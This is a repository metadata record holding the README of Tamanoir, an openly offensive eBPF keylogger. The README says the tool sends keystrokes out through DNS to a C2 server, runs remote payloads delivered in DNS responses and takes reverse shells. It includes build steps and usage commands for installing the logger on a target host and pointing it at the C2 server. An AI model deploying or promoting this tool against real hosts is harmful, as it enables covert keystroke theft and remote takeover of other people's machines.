{"id":25948748,"url":"https://github.com/adgaultier/tamanoir","last_synced_at":"2025-04-04T15:04:55.354Z","repository":{"id":266247053,"uuid":"875383720","full_name":"adgaultier/tamanoir","owner":"adgaultier","description":"An eBPF🐝 Keylogger with C2-based RCE payload delivery","archived":false,"fork":false,"pushed_at":"2025-03-14T17:29:34.000Z","size":79,"stargazers_count":256,"open_issues_count":3,"forks_count":22,"subscribers_count":4,"default_branch":"main","last_synced_at":"2025-03-28T14:05:54.707Z","etag":null,"topics":["aya","ebpf","hacking","keylogger","linux","ratatui","rust","security","tonic"],"latest_commit_sha":null,"homepage":"","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/adgaultier.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":"pythops"}},"created_at":"2024-10-19T20:34:40.000Z","updated_at":"2025-03-27T02:32:26.000Z","dependencies_parsed_at":"2025-01-15T11:11:31.903Z","dependency_job_id":"c0b93051-93e0-4d80-aa2b-fb8b11328e84","html_url":"https://github.com/adgaultier/tamanoir","commit_stats":null,"previous_names":["pythops/tamanoir","adgaultier/tamanoir"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/adgaultier%2Ftamanoir","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/adgaultier%2Ftamanoir/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/adgaultier%2Ftamanoir/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/adgaultier%2Ftamanoir/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/adgaultier","download_url":"https://codeload.github.com/adgaultier/tamanoir/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247198445,"owners_count":20900079,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["aya","ebpf","hacking","keylogger","linux","ratatui","rust","security","tonic"],"created_at":"2025-03-04T11:21:52.712Z","updated_at":"2025-04-04T15:04:55.324Z","avatar_url":"https://github.com/adgaultier.png","language":"Rust","funding_links":["https://github.com/sponsors/pythops"],"categories":["Rust"],"sub_categories":[],"readme":"\u003cdiv align=\"center\"\u003e\n  \u003ch1\u003eTamanoir\u003c/h1\u003e\n  \u003ch3\u003eAn eBPF🐝 Keylogger with \u003cbr\u003eC2-based RCE payload delivery\u003c/h3\u003e\n  \u003cimg src=\"https://github.com/user-attachments/assets/47b8a0ef-6a52-4e2d-8188-e77bb9e98d79\" style=\"width: 30%; height: auto;\"\u003e\n  \u003cp\u003e\u003csmall\u003e\u003ci\u003eA large anteater of Central and South America, Myrmecophaga tridactyla\u003c/i\u003e\u003c/small\u003e\u003c/p\u003e\n\u003c/div\u003e\n\n## 💡Overview\n\nTamanoir is structured around 3 components: \n\n### 1. Tamanoir\nAn eBPF program running on a target host, it will act as a keylogger and extract keystrokes via DNS queries.\u003cbr\u003e \nIn DNS response, attacker can choose to send chunks of RCE payload that will be executed on targeted host.\n\n### 2. Tamanoir-C2\nThe Command \u0026 Control server. It acts as a DNS proxy and can inject rce payloads in DNS response.\u003cbr\u003e \nIt also can handle reverse shell connections.\n\n### 3. Tamanoir-tui\nThe TUI client communicating with C2 server. Built on top of ratatui\n\n\u003cdiv align=\"center\"\u003e\n  \u003cimg src=\"https://github.com/user-attachments/assets/eb671b0a-9431-41b7-9d41-4a35f222a728\" style=\"width: 100%; height: auto;\"\u003e\n  \u003cp\u003e\u003csmall\u003e\u003ci\u003eTui client demo\u003c/i\u003e\u003c/small\u003e\u003c/p\u003e\n\u003c/div\u003e\n\n#### ⚡ Powered by [Aya](https://aya-rs.dev), [Tokio](https://github.com/tokio-rs/tokio),  [Tonic](https://github.com/hyperium/tonic) and [Ratatui](https://ratatui.rs)\n\n\n### Glossary\n- what is [eBPF](https://ebpf.io/what-is-ebpf/)\n- C2: Command and Control\n- RCE: Remote Code Execution\n\n\n### Documentation\nJump to:\n- [Focus on Tamanoir (eBPF)](assets/doc/tamanoir.md)\n- [Focus on Tamanoir-C2](assets/doc/tamanoir-c2.md)\n- [Focus on Tamanoir-Tui  ](assets/doc/tamanoir-tui.md)\n\u003cbr\u003e\n\n## Architecture\n\u003cdiv align=\"center\"\u003e\n  \u003cimg src=\"https://github.com/user-attachments/assets/725c9623-ae8e-4d7e-9210-0785d5f28d6e\" style=\"width:75%\"\u003e\n\u003c/div\u003e\n\n\n\n## 🚀 Setup\n\nYou need a Linux based OS.\n\n### ⚒️ Build from source\n\nTo build from source, make sure you have:\n\n- [bpf-linker](https://github.com/aya-rs/bpf-linker) installed.\n- [Rust](https://www.rust-lang.org/tools/install) installed with `nightly` toolchain.\n- protobuf-compiler\n\n#### 1. Build ebpf program\n\n```\ncd tamanoir-ebpf \u0026\u0026 cargo build --release\n```\n\n#### 2. Build user space program\n\n```\ncargo build -p tamanoir --release\n```\n\n#### 3. Build C2 Server\n\n```\ncargo build -p tamanoir-c2 --release\n```\n\n#### 4. Build Ratatui Client\n\n```\ncargo build -p tamanoir-tui --release\n```\n\nThese commands will produce  `tamanoir`, `tamanoir-c2` and `tamanoir-tui` executables  in `target/release` that you can add to your`$PATH`\n\n### 📥 Binary release\n\nYou can download the pre-built binaries from the [release page](https://github.com/adgaultier/tamanoir/releases)\n\n\u003cbr\u003e\n\n## 🪄 Usage\n\n### Tamanoir\n🖥️ on target host:\n```\nRUST_LOG=info sudo -E tamanoir \\\n              --proxy-ip \u003cC2 server IP\u003e \\\n              --hijack-ip \u003clocally configured DNS server IP\u003e \\\n              --iface \u003cnetwork interface name\u003e\n```\n\nfor example:\n\n```\nRUST_LOG=info sudo -E tamanoir \\\n              --proxy-ip 192.168.1.15 \\\n              --hijack-ip 8.8.8.8 \\\n              --iface wlan0\n```\n\n\n\n\u003cbr\u003e\n\n### C2 Server\n🖥️ on your C2 server host:\n\n```\nsudo tamanoir-c2 start\n```\n\u003e [!NOTE]\n\u003e Make sure port 53 is available\n\n\u003cbr\u003e\n\n### Tui Client\n🖥️ wherever you want to use the client:\n\n\n```\ntamanoir-tui -i  \u003cC2 server IP\u003e \n```\n\u003e [!NOTE]\n\u003e Make sure C2 server is reachable on port 50051\n\n\u003cbr\u003e\n\n\n\n\n\n## ⚠️ Disclaimer\n\n`Tamanoir` is developed for educational purposes only\n\n\u003cbr\u003e\n\n\n\n## ✍️ Authors\n\n[Adrien Gaultier](https://github.com/adgaultier)\n[Badr Badri](https://github.com/pythops)\n\n\u003cbr\u003e\n\n## ⚖️ License\n\nGPLv3\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fadgaultier%2Ftamanoir","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fadgaultier%2Ftamanoir","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fadgaultier%2Ftamanoir/lists"}